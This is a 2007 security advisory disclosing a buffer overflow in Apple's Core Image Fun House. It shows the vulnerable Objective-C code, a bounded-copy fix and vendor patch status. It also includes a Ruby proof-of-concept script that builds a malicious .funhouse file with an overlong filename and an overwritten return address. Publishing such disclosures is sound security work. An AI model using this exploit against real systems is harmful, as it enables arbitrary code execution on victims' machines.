Netragard Security Advisory 2007-06-28

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
*************************** NETRAGARD ADVISORY ***********************  
http://www.netragard.com  
"We make IT Safe"  
  
  
[Advisory Summary]  
- ----------------------------------------------------------------------  
Advisory Author : Adriel T. Desautels  
Researcher : Kevin Finisterre  
Advisory ID : NETRAGARD-20070628  
Product Name : Core Image Fun House  
Product Version : <= 2.0 OS X  
Vendor Name : http://www.apple.com  
Type of Vulnerability : Buffer Overflow  
Effort (1-10 where 1 == easy) : 5  
Impact : Arbitrary Code Execution  
Vendor Notified : Yes  
Patch Released : N/A  
Discovery Date : 07/10/2007  
  
  
  
  
[POSTING NOTICE]  
- ----------------------------------------------------------------------  
If you intend to post this advisory on your web-site you must provide  
a clickable link back to http://www.netragard.com as the contents of  
this advisory may be updated without notice.  
  
  
  
  
  
[Product Description]  
- ----------------------------------------------------------------------  
"From creating new solutions for print, photography, scientific  
visualization, and film post-production to enhancing your application's  
user interface with innovative and effortless visual effects, Core Image  
performs the heavy lifting that enables the next generation of imaging  
applications."  
  
- -- http://developer.apple.com/macosx/coreimage.html --  
  
  
  
  
  
[Technical Summary]  
- ----------------------------------------------------------------------  
It is possible to trigger an exploitable buffer overflow condition  
by creating a specially crafted .funhouse file.  
  
  
  
  
  
[Technical Details]  
- ----------------------------------------------------------------------  
The Funhouse application does not properly parse XML data.  
Specifically it is possible to create a specially crafted .funhouse  
file that will trigger and exploit a buffer overflow condition. The  
code responsible for the condition is as follows:  
  
// render origin handles using AppKit directly  
- - (CIImage *)drawPoints:(CIImage *)im  
{  
...  
~ NSString *str, *str2, *localizedParameter;  
...  
  
~ else if ([type isEqualToString:@"image"])  
~ {  
~ // image effect stack element  
~ // show an image origin (in its center)  
~ CGRect r = [[es imageAtIndex:i] extent];  
~ NSPoint offset = [es offsetAtIndex:i];  
~ pt.x = offset.x + (r.origin.x + r.size.width * 0.5);  
~ pt.y = offset.y + (r.origin.y + r.size.height * 0.5);  
~ str = [[es filenameAtIndex:i] stringByAppendingString:@"  
center"];  
~ [self drawPoint:pt label:str intoContext:cg];  
~ }  
  
}  
  
The following code is called by the code referenced above:  
  
/*  
~ Drawing  
*/  
  
// draw an onscreen handle for an image origin, text origin, or filter point  
// the handle is a "center symbol" - a circle with crosshairs through it.  
// the handle is labelled with the string "str".  
// all items are "shadowed"  
- - (void)drawPoint:(NSPoint)pt label:(NSString *)str  
intoContext:(CGContextRef)cg  
{  
...  
~ char cstr[256];  
...  
~ if (!movingNow)  
~ {  
~ [str getCString:cstr]; <-- Vulnerability Exists Here  
  
  
[Fix]  
- ----------------------------------------------------------------------  
To fix the issue the [str getCString:cstr]; needs to be replaced with  
[str getCString:cstr maxLength:254]; to prevent overflows.  
  
  
- - [str getCString:cstr];  
+ [str getCString:cstr maxLength:254];  
  
  
[Proof Of Concept]  
- ----------------------------------------------------------------------  
#!/usr/bin/ruby  
# Copyright (c) Netragard, LLC. [email protected]  
#  
# /Developer/Applications/Graphics Tools/Core Image Fun House.app  
# /Contents/MacOS/Core Image Fun House  
#  
# (gdb) x/10s 0xbfffddf7  
# 0xbfffddf7: 'Z' <repeats 101 times>, "DCBA center"  
#  
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):  
# CFPropertyListCreateFromXMLData(): plist parse failed;  
# the data is notproper UTF-8. The file name for this data  
# could be:  
$  
# /Users/test/Desktop/SuperTastey.funhouse/file.xml  
# The parser will retry as in 10.2, but the problem should be  
# corrected in the plist.  
#  
# \x80-\xFF range that do not form proper utf8  
  
len = 300  
fname = "SuperTastey"  
retaddr = 0x0d0d0d0d # There are lots of filtered chars!  
  
if File.exist?(fname + ".funhouse/file.xml")  
File.unlink(fname + ".funhouse/file.xml")  
Dir.rmdir(fname + ".funhouse")  
end  
Dir.mkdir(fname + ".funhouse")  
  
FUNSTUFF =  
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>" +  
"<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\"  
\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">" +  
"<plist version=\"1.0\">" +  
"<dict>" +  
"<key>layers</key>" +  
"<array>" +  
"<dict>" +  
"<key>file</key>" +  
"<string>" +  
"Z" * len + [retaddr].pack("V") +  
"</string>" +  
"<key>offsetX</key>" +  
"<real>0.0</real>" +  
"<key>offsetY</key>" +  
"<real>0.0</real>" +  
"<key>type</key>" +  
"<string>image</string>" +  
"</dict>" +  
"<dict>" +  
"<key>classname</key>" +  
"<string>CIGlassDistortion</string>" +  
"<key>type</key>" +  
"<string>filter</string>" +  
"<key>values</key>" +  
"<dict>" +  
"<key>inputCenter_CIVectorValue</key>" +  
"<string>[150 150]</string>" +  
"<key>inputScale</key>" +  
"<real>200</real>" +  
"<key>inputTexture</key>" +  
"<string>" +  
"Z" * 50000 +  
"</string>" +  
"</dict>" +  
"</dict>" +  
"</array>" +  
"</dict>" +  
"</plist>" + "\n"  
  
target_file = File.open("SuperTastey.funhouse/file.xml", "w+") { |f|  
~ f.print(FUNSTUFF) # weeeeee... lets have fun.  
~ f.close  
}  
  
  
  
[Vendor Status]  
- ----------------------------------------------------------------------  
Vendor Notified  
  
  
  
  
  
[Vendor Comments]  
- ----------------------------------------------------------------------  
This issue is addressed in Xcode tools 3.1. Credit to Kevin  
Finisterre of Netragard for reporting this issue to Apple. Further  
information is available at:  
  
http://support.apple.com/kb/HT1222  
  
  
  
  
[Disclaimer]  
- ----------------------http://www.netragard.com------------------------  
Netragard, L.L.C. assumes no liability for the use of the information  
provided in this advisory. This advisory was released in an effort to  
help the I.T. community protect themselves against a potentially  
dangerous security hole. This advisory is not an attempt to solicit  
business.  
  
<a href="http://www.netragard.com>  
http://www.netragard.com  
</a>  
  
  
[Netragard Whitepaper Downloads]  
- ----------------------------------------------------------------------  
Choosing the right provider : http://tinyurl.com/2ahk3j  
Three Things you must know : http://tinyurl.com/26pjsn  
  
  
  
  
  
  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.5 (Darwin)  
  
iD8DBQFId6ijQwbn1P9Iaa0RAoLpAJ94J7P/GGI+fr4P3UlORkG7v6xWEwCePG6n  
Tk3RLUnGHHdl6WHLzaoY07U=  
=MJZy  
-----END PGP SIGNATURE-----  
`